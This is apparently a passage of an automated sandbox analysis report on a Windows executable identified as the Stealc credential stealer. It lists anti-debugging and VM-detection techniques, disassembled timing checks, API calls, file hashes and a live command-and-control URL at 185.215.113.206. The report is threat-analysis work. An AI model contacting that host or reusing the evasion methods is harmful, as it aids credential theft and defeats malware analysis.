                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8E71 second address: 5C8EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269634h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F95D5269628h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2DB2h], edx 0x0000002a push 00000004h 0x0000002c mov edx, dword ptr [ebp+122D2A9Ch] 0x00000032 call 00007F95D5269629h 0x00000037 jmp 00007F95D526962Ah 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F95D5269635h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8EE4 second address: 5C8EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8EE9 second address: 5C8F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnl 00007F95D5269626h 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8F1B second address: 5C8F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C914E second address: 5C91A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F95D5269630h 0x0000000b jmp 00007F95D526962Dh 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dl, 9Fh 0x00000017 push dword ptr [ebp+122D33CBh] 0x0000001d mov dword ptr [ebp+122D18F1h], ebx 0x00000023 add dx, 8500h 0x00000028 push F742D463h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 jmp 00007F95D5269635h 0x00000035 pop eax 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C91A7 second address: 5C91AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC16E second address: 5CC172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC172 second address: 5CC180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F95D47CFB32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC180 second address: 5CC186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102ED second address: 4C10345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F95D47CFB32h 0x0000000f jmp 00007F95D47CFB35h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F95D47CFB2Eh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F95D47CFB2Eh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103F2 second address: 4C103F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103F6 second address: 4C103FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103FC second address: 4C10430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95D5269630h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95D526962Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10430 second address: 4C10452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F95D47CFB2Bh 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9E59 second address: 4E9E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5668B4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000E4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000D16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D1160 GetSystemInfo,ExitProcess,0_2_000D1160
                Source: file.exe, file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2208889056.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware[
                Source: file.exe, 00000000.00000002.2208889056.0000000000BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2208889056.0000000000BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                Source: file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13596
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13648
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13593
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13608
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13615
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D45C0 VirtualProtect ?,00000004,00000100,000000000_2_000D45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9750 mov eax, dword ptr fs:[00000030h]0_2_000E9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000E7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000E9600
                Source: file.exe, file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_000E7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_000E6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000E7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_000E7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Amadey
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/e2b1563c6670f193.php3ufile.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/e2b1563c6670f193.phpkfile.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/wsfile.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/&ufile.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/e2b1563c6670f193.phptfile.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1542963
                                  Start date and time:2024-10-27 01:21:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 9s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 83
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                                  • 185.215.113.217
                                  uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                                  • 185.215.113.217

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.948995573495278
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'850'368 bytes
                                  MD5:083803a310e16df3e21777d07a5be88a
                                  SHA1:1a0a8d22d1e39395c4f98a5188ee91384ec54d6f
                                  SHA256:4f3a31155f05af798afc16c664a7e4b364b9cd7f78d2c40f92ca25b1f9dc115b
                                  SHA512:129dfb95b8af7fdb9e46c45a7b567da7432d7244cd85c27c4400b9e995bd19c783726d6acc9eef67aa50f8a08b1b6b493d4d336bf2b17a12c648d86789119e87
                                  SSDEEP:24576:v9WuzrGeK64e7HoU08OIq7L69YNqnhu6lYukZwFqPe85Z7+4IMf1xK7aA8dEY:v9WuzrGev4e7HoUqdNqhNRkZ+4zD28T
                                  TLSH:A28533BB1B6ADE1AC88E5E32567F35322732A4DD01E9D0D0D7A2CE34E9D924731C66C0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xaa6000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F95D504757Ah
                                  hint_nop dword ptr [eax+eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F95D5049575h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
